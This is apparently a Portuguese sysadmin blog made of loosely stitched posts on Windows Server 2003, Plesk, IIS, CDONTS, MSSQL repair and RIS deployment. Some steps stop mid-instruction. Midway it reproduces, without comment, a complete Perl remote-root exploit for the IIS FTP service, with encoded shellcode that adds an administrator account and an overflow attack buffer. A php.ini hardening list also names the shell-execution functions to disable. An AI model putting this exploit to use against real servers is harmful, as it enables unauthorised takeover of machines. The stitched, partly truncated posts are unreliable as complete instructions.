De nerd para nerd, de Geek para Geek, de nerd para não nerd!

Muita gente dá dicas de mexer com registros do Windows e etc, mas na verdade existem poucas soluções para terminais congelados do 2003 server:

1 – Aplicar TODAS updates do Windows (isso vai te privar daquele esquema de 70 segundos de logon), em especial: http://support.microsoft.com/kb/832971

2 – Reparar o sistema (chkdsk e remover possíveis vírus),

3 – Se o ponto 1 e 2 não resolverem é o Perfil em crash.

Como testei tudo a saída foi o item 3, o perfil de login no RDP estava corrompido.

Para sanarmos o problema existem 2 formas:

1 – Ou criamos um novo perfil (Criar um novo usuário e senha, o problema de login congelado acabará),

2 – Usamos outro login, logamos, deletamos a pasta do usuário em documents and settings e depois logamos com ele novamente (RECOMENDO BACKUP DELA ANTES), isso vai forçar o windows a criar um novo perfil, principalmente em dados de aplicativos.

Depois é só curtir.

Abraços.

Pode parecer curioso, mas se o seu windows XP ou windows server 2003 estiver parando em 34 minutis (instalando dispositivos) vou lhe dizer o nome do “acusado ou acusados”, DISPOSITIVOS USB!

Coloque um teclado PS2 ao invés de um teclado USB, assim como mouse (desconecte impressoras e os demais usb) e corra para o abraço .

Se isso acontece com o plesk, verifique se você já fez o seguinte:

1 – Tentou ativar o modo UNIX no ftp.

2 – Verificou se as permissões de pasta no root do ftp estão ok (padrão nas contas de ftp é a pasta httpdocs ou / do vhost do cliente).

3 – Rodou -> “%plesk_bin%\ftpmng.exe” –remove-all “%plesk_bin%\ftpmng.exe” –reconfigure-all

4 – RODOU:

net stop MSFTPSvc
net start MSFTPSvc

5 – Por fim criou o dword HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\InetInfo\Parameters\DisableMemoryCache e deu 1 como valor

SE NÃO rolou nada para o ftp, mesma mensagem de erro? Ainda persiste o erro?

Que tal tentar o FTP para acesso do main ip? LOL, por incrível que pareça as vezes o maion ip precisa ser ajustado como host na conexão de ftp

Para sanar, na string de conexão use:

conexao.open “Provider=SQLOLEDB.1;Persist Security Info=False;User ID=sa;Initial Catalog=client;Data Source=IP,1433;PWD=senha;”

Aonde sa é o user que você vai informar (do banco de dados), IP é o ip do srv aonde existe o mssql e 1433 é a porta do mssql.

Recebeu o erro acima?

Existem 2 vertentes para sanar seu problema:

1 – O seu PLESK é muito recente e não reconhece a versão do seu Mailenable,

2 – Seu Mailenable está precisando ser reintegrado no plesk.

Mesmo que você mande o plesk listar os componentes (procedimentos padrão) ele ainda vai dar erro. Qual a saída?

Entre na pasta de admin do plesk e na pasta bin (VIA MS-DOS) e execute:

Para sanar isto observe se a pasta httpdocs do cliente permite leitura e escrita para o usuário do plesk.
Colocando isto sana o problema.
Isto aplica-se ao Windows Server + Parallels plesk 9.x e 10.x.
Fonte?

EU, EU MESMO E IRENE!


Eliminate IE Flickering: Configure this setting to force off-screen composition of Internet Explorer, which eliminates the flickering effect. In HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Main, set the DWORD value for Force Offscreen Composition to 1.

Disable Unused Subsystems: Not using the POSIX subsystem on your Terminal Server? Disable it and navigate to the registry location HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Subsystems and delete the Posix key. Disable the File Indexing Service: File Indexing Service is great for quickly searching for files, but your Terminal Server arguably shouldn't have that many user files on it and the indexing process can consume huge system resources. To disable it, navigate to the properties menu of each drive on your system and deselect the box for Allow Indexing Service to index this disk for fast file searching.


O registro do windows deve assemelhar-se com:

http://redmondmag.com/articles/2006/06/01/speed-up-terminal-server.aspx

NADA de pânico, reveja antes 2 coisas:

1 – se no log de erros do site aparece 800a0046|Permission_denied no momento do uso do CDONTS,
2 – Reveja todos os passos abaixo (Parallels):

[How-To] Installing CDONTS on Windows 2003 Server
Article ID: 560
Last Review: Sep, 23 2010

Popularity:

APPLIES TO:

* Plesk 8.x for Windows
* Plesk 7.x for Windows
* Plesk 9.x for Windows

Resolution

Microsoft Windows Server 2003 does not install Collaboration Data Objects (CDO) for NTS (CDONTS). Therefore, applications using CDONTS do not work on Windows Server 2003-based computers. Windows Server 2003 provides improved alternatives to CDONTS.

For CDONTS to work in a Windows Server 2003-based computers, please do the following:

1. Download the attached CDONTS.ZIP file (you can also get CDONTS.DLL from the installation CD of your Windows 2000). Once downloaded, unzip CDONTS.DLL and put it in

For 32-bit systems:
%systemroot%\system32 folder (by default C:\Windows\system32).

For 64-bit systems:
%windir%\syswow64 (by default C:\Windows\syswow64).

2. Register the CDONTS.DLL component in the server using the following command:

For 32-bit systems:

regsvr32 “%systemroot%\system32\cdonts.dll”

For example:

C:\WINDOWS\system32>regsvr32.exe cdonts.dll

For 64-bit systems:

regsvr32 “%systemroot%\syswow64\cdonts.dll”

For example:

C:\WINDOWS\syswow64>regsvr32.exe cdonts.dll

3. Once the CDONTS.DLL component is registered, you should check if your SMTP service is running.

Go to Administrative tools, IIS and Expand your local machine. If the SMTP service is listed, it means it is already installed, if not you should install this service.

To install SMTP, do the following:

Go to Control Panel, Add/Remove Programs, Add/Remove Windows Components, Application Server, IIS, Select SMTP service, Click OK.

4. Change the port number for the SMTP service. The default port is 25. Use 25 only when no other SMTP service is running. If there is already another SMTP service running on the server, change the SMTP port of IIS, for example to port 8025.

You can make this through IIS management console: Control Panel, IIS, expand `local computer`, SMTP, Properties, General, click Advanced button, Edit.

5. Set up SMTP service. Most important is setting up a fully qualified domain name for the SMTP service: Control Panel, IIS, expand `local computer`, SMTP, Properties, Delivery, click Advanced button and set up Security service for SMTP.

It is required to give permissions to IIS_WPG standard IIS Worker Process Group. Control Panel, IIS , expand `local computer`, SMTP, Properties, Security, click Add button, then click Object types button…, select Groups element, click OK, enter IIS_WPG as object name to add and click OK.

Additional configuration: Select Authentication and check Anonymous Access and Integrated Windows Authentication. Click OK and then click CONNECTION. Set up the RELAY settings. Click DELIVERY tab and then click ADVANCED. Set up the MAX Count hop to the required value, even though we suggest setting it to at least 20.

Now the SMTP service of IIS is already configured.
Additional information
For additional information, please, refer to

http://support.microsoft.com/default.aspx?scid=kb;en-us;324649

Attachments:

* cdonts.zip(172Kb)

—————————–

Depois de seguir os passos assim, caso você perceba que ainda assim não funciona normal o Cdonts faça algo mais interessante, abra o C:\Inetpub\Mailroot
Nesta pasta dê permissão para IUSR_NOMEDOPC (se o pc fosse nerdblog [hostname] seria iusr_nerdblog).
A permissão deve ser completa para ele.
Depois disso reinicie o IIS e prepare a caixa de BIS para minha casa.

Se você está recebendo a mensagem de erro:

Unable to load object of type Skin with id=8: Skin: unable to select: no such row in the table

Ao tentar logar-se no Parallels Plesk 10.x, nada de Pânico, provavelmente a saída ocorre pois a tabela com a Skin do plesk não foi atualizada corretamente.
Normalmente o id dela fica sendo 1, então se o painel (foi o caso do meu cliente) pedia 8 como id na tabela Skins, para corrigir basta fazer o seguinte:

Abra o MS-DOS e digite:

Erro no parallels plesk:

ERROR: Exception The system cannot find the file specified. (Error code 2) at Unable to connect to pipe \\.\pipe\psapipe

Para sanar este erro você pode reiniciar o plesk (caso esteja iniciado) ou pode inicializar o mesmo caso esteja parado.

Em um ambiente Windows Server 2003 (web edition, standard edition, enterprise edition ou datacenter edition), comumente observamos que muitos administradores de sistemas Microsoft sofrem com a lentidão no logon de seu perfil de usuário (ainda que seja o administrador do sistema). Uma das coisas para quem está usando o active directory e percebe uma longa demora no logon do usuário de rede pode sanar o problema muito facilmente com apenas um ajuste:

Informar que o dns da conexão de rede é o servidor de active directory (server de dns, ad  e wins, normalmente).

Mas e quando o sistema não tem active directory e apresenta lentidão no ato do login (ainda que localmente e também logando-se como administrador)? Como resolvê-lo?

Alguns pontos que podemos considerar abaixo para mapear o problema e saná-lo com facilidade:

1 – Em administrative tools -> events, verifique se os logs do windows não estão muito grandes, uma possível rotaçÃo desses logs seria a saída (isto é, quando ajustamos estes logs para armazenarem muitos megas de informação),

2 – Verifique se, ao iniciar o sistema operacional o mesmo não está carregando serviços desnecessários (pode-se usar start->run-> msconfig), ali você estará apto a desativar serviços que você REALMENTE conhece e que precisam ser parados por estarem com problemas ou não estejam com uso em seu sistema (ainda que não resolva, acredite, poupa memória que é uma beleza),

3 – Em services procure por serviços inúteis ou mesmo ultra desnecessários como por exemplo Wifi aonde normalmente se tem cabeamento estruturado,

4 – Observe, dentro das ferramentas administrativas o desempenho do servidor com a ferramenta de desempenho, veja se o load ultrapassa 50% de cpu em tempo corrente, isto não seria bom e estaria na hora de avaliar uma possível upgrade. Paginação e serviços que operam em background podem esfaquea-lo pelas costas no momento em que mais precisa de memória.

5 – Desative o bendito serviço de indexação do Windows, raramente você que usa um servidor Windows Server não saberá aonde os arquivos estão (pelo menos os administradores de sistemas devem pensar assim),

6 – Verifique S.m.a.r.t, badblocks e a rotação constante do disco com HD tune (é grátis, leve e funciona de verdade!),

7 – SE TODOS os pontos acima foram considerados WIN por sua equipe ou você, acredite, o ponto a seguir irá sanar a coisa. Se eu lhe disser que é um mapeamento de unidade de rede que carrega aumenticamente e que está offline, e se eu afirmar que esse danado está ocasionado esta lentidão, vai acreditar? Pois é, se estiver inativo por algum motivo físico (pc queimado, mudança de pc e etc) remova-o, do contrário ative o dispositivo de rede e o problema estará sanado.

Observação: Será que essa dica não vale uma caixa de bis? Whois no domínio, sedex na mão e pls, uma caixa de bis preto!

Este é o erro que está ocorrendo com você?

Error: Runtime error in pmmcli:
(3, ‘GetDiskFreeSpace’, ‘The system cannot find the path specified.’)
Traceback (most recent call last):
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 1846, in main
data_action_response, errcode_response, error_message = actions.get(sys.argv[1][2:])(parameters)
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 1721, in make_dump
return ActionRunner(MakeDumpAction, backup_task_description, None).doActivity()
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 75, in doActivity
result = self.processor.doActivity()
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 860, in doActivity
if osutil.free_bytes(local_dump_directory) < (long(disk_space_required) * 1048576):
File “C:\Program Files\Parallels\Plesk\admin\lib\python\osutil.py”, line 188, in free_bytes
sectorsPerCluster, bytesPerSector, numFreeClusters, totalNumClusters = GetDiskFreeSpace(os.path.splitdrive(path)[0] + “\\”)
error: (3, ‘GetDiskFreeSpace’, ‘The system cannot find the path specified.’)

Se é, antes de tentar seu backup, atualize o plesk para uma versão mais recente e o problema deverá estar sanado.

Antemão estou quase chorando por estar usando access, mas como se diz: “Sábio é o que dança conforme a música manda!”.
Estou desenvolvendo ferramentas para automatizar algumas replicações de dados de uma empresa e estou usando php (tecnologia) + access (isso é um banco?)

Este erro é ocasionado pelo fato de existir um drive fechando a conexão (na realidade aberto e acaba bloqueando novas conexões), por exemplo o Access abrindo a bendita base de dados access (.MDB).

Garanta que nada esteja abrindo o access database.

Uma forma de ver que isto está ocorrendo é observar se na pasta aonde o banco de dados esteja, exemplo nerdblog.mdb contenha também um arquivo nerdblog.ldb.

Ao fechar o driver ele automaticamente removerá o arquivo .LDB.

Ao acessar o mssql management studio procure pela aba query (clicando com o botão direito em cima do banco de dados) e insira as seguintes linhas:

EXEC sp_resetstatus ‘nomedobd’;
ALTER DATABASE nomedobd SET EMERGENCY
DBCC checkdb(‘nomedobd’)
ALTER DATABASE nomedobd SET SINGLE_USER WITH ROLLBACK IMMEDIATE
DBCC CheckDB (‘nomedobd’, REPAIR_ALLOW_DATA_LOSS)
ALTER DATABASE nomedobd SET MULTI_USER

Isto deverá corrigir o problema.

Bem, se você quer mais segurança em um ambiente compartilhado você precisará de ajustar seu php.ini global (/usr/local/lib/php.ini) em seu servidor de hospedagem compartilhada afim de prevenir ataques usando recursos avançados do php.

Como faremos isto?

Procure pela linha disable_functions =

e depois do ‘=’ aplique as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Talvez você precisará do shell_exec para o caso do Fantástico Deluxe.
Avalie se vale a pena deixar esta função ativa e prossiga

Prezados, sou conhecido na comunidade opensource por causa de meus how tos, procuro não omitir informações a ninguém e mais uma vez lá vai uma dica quente:

Se você está sofrendo com o que eu sofri, deixar o worpress sair do basicão do seo no iis, estilo:

site.com.br/index.php/meu-post

Basta seguir os passos abaixo:

1 – baixe o arquivo dll:

http://wp-url-rewriting-on-iis.googlecode.com/files/wp-url-rewriting-2.1-win32.zip

Ou para 64 bt:

http://wp-url-rewriting-on-iis.googlecode.com/files/wp-url-rewriting-2.1-X64.zip

Extraia o arquivo para c:\windows\system32\

2 – Crie um filtro ISAPI dentro do IIS no domínio desejado com o nome:
url-rewrite.
No botão browse procure pelo arquivo wp-url-rewriting.dll dentro da pasta c:\windows\system32\ e selecione-o.

Pronto.

Feito isto o site deverá apresentar o SEO (permalinks) do WordPress de maneira satisfatória.

Abraços.

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Bem, o erro 5.7.1 pode significar uma chuva de coisas, mas com uma simples ajuda, ou melhor, com uma simples dica este erro pode parar.

Isto normalmente ocorre por causa do RELAY que está em off (por padrão) após instalado.

O Ajax destes mailserver (o webmail em ajax) é muito bonito (mesmo). (parece que os caras são fanáticos por ext-js)

Ok, acesse o Merak (no gestor administrativo dele) e procure pelo Menu SECURITY, neste menu, procure pelo item Allow RELAY.

Isto deve resolver, caso não resolva procure por DENY SMTP EHLO, se estiver marcado, desmarque.

Caso não resolva, em última instância desabilite o suporte por SSL/TLS.

Bugs estão por toda parte e isto faz parte do panelão.

Abraços.

Opa galera, mantendo o rítimo de posts em alta, vamos lá.

Hoje me surgiu uma dúvida simples:

Aonde fica localizado o danado do php.ini em um windows server com painel de controle plesk?

Simples

C:\Program Files\Parallels\Plesk\Additional\PleskPHP5\php.ini

AP754 – RIS – Serviços de Instalação Remota

Overview

Em grandes redes corporativas, instalar sistemas operacionais nas estações pode ser um processo lento e trabalhoso. Pensando na questão da automação, da padronização e também da centralização de informações, a Microsoft desenvolveu o RIS, encontrado em algumas versões do Windows Server.

O RIS (lê-se “rís”) é uma ótima ferramenta administrativa, que de uma forma resumida, armazena a imagem* de um determinado sistema operacional e permite que clientes conectados através da rede instalem este sistema sem a necessidade de CD’s e/ou disquetes**.

Irei abordar neste artigo a instalação do Windows XP Professional com base em um Servidor Windows 2003 Standard Edition, no modo de idioma nativo (português) e em modo “multi-language”, para os casos em que o idioma do servidor for diferente do cliente (e vice-versa).

Ex.: Windows Server 2003 em inglês e Windows XP Pro em português.

*Na verdade, quando falamos imagem, pensamos em um arquivo como o gerado pelo Norton Ghost©, porém neste caso, a “imagem” nada mais é que o CD de instalação do sistema operacional alocado em um diretório definido pelo usuário.

**O disquete será necessário em um caso específico que abordaremos adiante.

Solução

:: Itens necessários para utilização do RIS ::

-Servidor Windows com Active Directory® e zona integrada* ao AD;
(o servidor pode ser controlador de domínio ou membro dele)
-Servidor DHCP ativo e autorizado;
-Espaço em disco no servidor para armazenarmos os arquivos do Windows XP;
-CD de instalação do Windows XP Professional;
-CD de instalação do Windows 2003 Std. Edition;
-CD de instalação do Windows 2000 Professional (opcional);
-Cliente com placa de rede (NIC) que suporte o recurso PXE ou placa de rede com suporte** ao disquete de inicialização do RIS;

*Muitos tutoriais e artigos não informam, mas a zona DNS deve ser preferencialmente integrada ao AD. No Windows Server 2003, ao elegermos um DC, a zona criada fica integrada ao AD, por padrão.

*Confira a lista de adaptadores de rede compatíveis com o disquete de inicialização do RIS mais adiante neste tutorial.

PXE = Pre-Boot Execution Environment

Acesse o link: http://en.wikipedia.org/wiki/Preboot_Execution_Environment e obtenha maiores informações sobre PXE.

:: Sistemas operacionais suportados para se efetuar a instalação remota ::

-Windows XP Professional;
-Windows Server 2003, Standard, Enterprise x32 e x64, e Web Editon;
-Windows 2000 Professional, Server e Advanced Server.

Info: Os dados acima foram retirados do site da Microsoft.

Nota: Recomendo para testes o VMWARE, pois sua interface de rede suporta o PXE.

:: Iniciando o Trabalho ::

Acesse a ferramenta “Adicionar ou Remover Programas” no Painel de Controle do Windows 2003. Clique em “Adicionar ou Remover Componentes do Windows”. Ao abrir a lista, procure pelo item “Serviços de Instalação Remota” e instale-o. O CD do Windows Server será solicitado para finalização desta tarefa.

Ponto-Chave: Verifique se o servidor DHCP está OK, bem como DNS, pois são cruciais para que o cliente encontre os serviços na rede.

Recomendo reiniciar o servidor após instalar o RIS. Em alguns testes, o serviço não pôde ser contatado, e não descobri por que. De fato o sistema nem pede para ser reiniciado, então por uma questão óbvia não o fiz, mas (…)

Após reiniciar o servidor, abra as Ferramentas Administrativas e clique sobre o item “Programa de Instalação dos Serviços de instalação remota”.

Por se tratar de um primeiro acesso, será aberto um assistente, o clássico “next next finish”, mas algumas opções têm sua importância. Reserve um minuto e veja abaixo a lista que o assistente solicita para o RIS.

Especifique o local físico para armazenar as imagens (arquivos de instalação) dos sistemas operacionais que estarão disponíveis para os clientes. Uma boa prática é colocar em um HD separado, ou então, em uma outra partição. Tenha em mente que o que será mais usado é: transferência de dados (rede/disco).

Na tela abaixo, marque a primeira opção, caso contrário os clientes não encontrarão o serviço na rede.

Nesta parte, insira o CD do Windows XP Professional. O assistente copiará os arquivos para o diretório das imagens, especificado anteriormente.

Abaixo será solicitado que o usuário entre com o nome do diretório onde os arquivos de instalação ficarão armazenados. Por padrão, o sistema retornou o nome “WINDOWS”, mas achei um tanto genérico e renomeei para “WINXP”. Não utilize nomes grandes, dê preferência a algo simples e intuitivo, como WIN2KPRO, WIN2K3S, WIN2K3W.

Na descrição da imagem, deixei a mensagem padrão.

O
Após conferir os dados…

…o assistente começa a cópia dos arquivos localizados no CD-ROM.

Após a cópia, teremos finalizado praticamente a parte mais longa da tarefa de preparação de nosso serviço de instalação remota. Na próxima parte, utilizaremos nosso tempo para realizar uma “autópsia”, com o intuito de simplificar e descobrir algumas coisas do RIS.

:: Diretórios Utilizados pelo RIS ::

Caso não lembre, definimos o diretório D:\RemoteInstall para abrigar os serviços disponíveis através do RIS. Este diretório é compartilhado por padrão, com o nome de REMINST. Nota: Não é necessário alterar NADA em suas permissões.

Na figura abaixo, destacarei apenas um arquivo, o rbfg.exe. Este pequeno executável é o Gerador de Disquete de Instalação Remota para interfaces de rede que não possuem o ROM de boot remoto (PXE). Lembre de consultar a lista de compatibilidade, pois nem todas as interfaces suportam este recurso. Se a interface a ser utilizada não é compatível, não perca tempo gerando o disquete. O arquivo riprep.exe será debatido em outro artigo, mas para os curiosos, este utilitário é um gerador de imagem de sistema operacional, mas já com aplicativos instalados. Não falaremos sobre ele, pois será necessário um breve bate-papo sobre HAL, MassStorage Devices, ChipSets (…)

Info: Para consultar a lista de interfaces compatíveis, execute o rbfg.exe e clique sobre o botão “Lista de Adaptadores”.

No diretório abaixo, localizamos dois arquivos com a extensão .osc. Mais adiante falaremos sobre estes arquivos, que nada mais são que as telas de instalação que serão visualizadas pelos clientes RIS.

Abaixo, podemos ver o diretório onde estão armazenados os arquivos de startup do cliente, que serão executados no ambiente “pre-boot”. Quando o cliente inicia a máquina e pressiona F12 para que o boot seja efetuado pela rede*, a interface busca um IP via DHCP e inicia todo o processo, solicitando novamente que se pressione F12 ao encontrar um serviço disponível.

Dica: Caso queira automatizar um pouco esta inicialização, renomeie o arquivo startrom.com para startrom.old e o arquivo startrom.n12 para startrom.com. Desta maneira, não será necessário pressionar F12 após ter um IP atribuído e o serviço encontrado.

Info: *Em algumas situações será necessário definir na BIOS que a interface de rede participe do processo de BOOT, caso contrário não conseguiremos conexão cliente-servidor. Ex.: Um determinado PC já possui um sistema operacional instalado e não apresenta a opção de BOOT pela rede através do F12. Na BIOS foi definido que a interface de rede não participa da seqüência de boot, ou até participa, mas em uma posição posterior ao HD/CD/Floppy. O que ocorrerá é que o HD por já possuir um S.O, “não dará chance” ao usuário iniciar o processo pela rede.

No diretório marcado abaixo, podemos ver mais arquivos .osc, que são as telas de instalação do RIS, vistas pelo cliente, para o idioma “Portuguese”.

Nota: Estas telas estão em inglês, e adiante veremos como customizá-las.

Na figura a seguir, vemos um diretório de extrema importância, que é o “templates”. Este diretório armazena o arquivo ristndrd.sif, que é um arquivo de respostas para instalações automatizadas do Windows.

Info: Após gerar a imagem, o RIS cria um arquivo de respostas padrão, localizado em RemoteInstall\Setup\Portuguese\Images\WINXP\i386\templates, porém podemos criar um NOVO arquivo de respostas, substituindo o atual OU utilizando-o como mais uma opção na instalação automatizada. Veremos adiante como fazer isso, inclusive oferecendo ao usuário opções de instalação (automática, customizada – onde se pode definir o nome da maquina, ou a terceira opção, que é continuar uma instalação mal-sucedida e também a opção de manutenção – que não será abordada neste artigo).

:: Conhecendo, Editando e Preparando as Telas de Instalação do RIS ::

Procure pelo diretório D:\RemoteInstall\OSChooser e verifique os arquivos com extensão .osc. Abra algum deles com o bloco de notas, e verá que é bem parecido com HTML.

Sim, podemos padronizar estas telas, obedecendo claro, sua sintaxe. Estes arquivos, como dito anteriormente, são as telas que o cliente utilizará durante todo o processo oferecido pelo RIS.

No momento em que o cliente encontra o serviço disponível na rede e o executa, a primeira tela a ser mostrada é D:\RemoteInstall\OSChooser\welcome.osc. A partir deste item, o usuário segue para outras telas, de acordo com o que for definido como padrão ou de acordo com suas escolhas. Basicamente é isto que ocorre.

Após ligeira explicação, trataremos em primeiro plano a instalação no modo de nosso idioma nativo (português, sendo único idioma disponível).

Ao passar pela primeira tela (welcome.osc), seguiremos para D:\OSChooser\Portuguese\login.osc, onde precisaremos autenticar o usuário que fará a instalação. Veremos isso durante o processo cliente.

As próximas telas referem-se às opções de instalação e serão descritas no próximo tópico: “Automação com Arquivos de Respostas e Opções de Instalação”.

No modo multi-language (2 ou mais idiomais disponíveis), precisamos renomear o arquivo D:\RemoteInstall\OSChooser\welcome.osc para algo diferente, como welcome.old, copiar o arquivo multilang.osc como welcome.osc, e depois editá-lo, de acordo com as opções de idiomas que desejamos oferecer. Observe atentamente a sintaxe, os exemplos presentes no arquivo modelo são bem claros.

A diferença agora é que ao acessar o serviço, o cliente verá uma tela de boas vindas (welcome.osc) com as opções de idioma definidas pelo administrador (é, você mesmo!). O restante segue o padrão explicado acima, mas lembre que o diretório referente ao idioma selecionado deve existir em \RemoteInstall\OSChooser\[Idioma] contendo os arquivos .osc.

Ex.: Para o Francês: \RemoteInstall\OSChooser\French

Além disso, dentro do diretório criado para as imagens, deve haver algum Sistema Operacional disponível para o idioma que você definiu, caso contrário não fará muito sentido!
:: Automação com Arquivos de Respostas e Opções de Instalação ::

Como mencionado anteriormente, o RIS gera um arquivo de respostas padrão, chamado ristndrd.sif.

Podemos utilizar o setupmgr.exe para gerar um novo arquivo de respostas para o RIS. Caso não esteja familiarizado com esta ferramenta, não se preocupe. É bem simples e nada que 15 minutos de estudo não resolva. Esta ferramenta é encontrada no CD do Windows XP, em \SUPPORT\TOOLS. Procure por Deploy.CAB e extraia seu conteúdo para um diretório qualquer em sua máquina, de preferência com o nome “Deploy” mesmo! Ao gerar o arquivo de resposta pelo setupmgr.exe (utilizando a opção do RIS, claro!), podemos associá-lo a uma imagem já presente no diretório de distribuição, inserindo o arquivo como mais uma opção, ou então substituindo o arquivo padrão que foi gerado (ristndrd.sif). Temos duas opções, e a mais fácil é colocar o arquivo diretamente na pasta a seguir:

D:\RemoteInstall\Setup\Portuguese\Images\WINXP\i386\templates

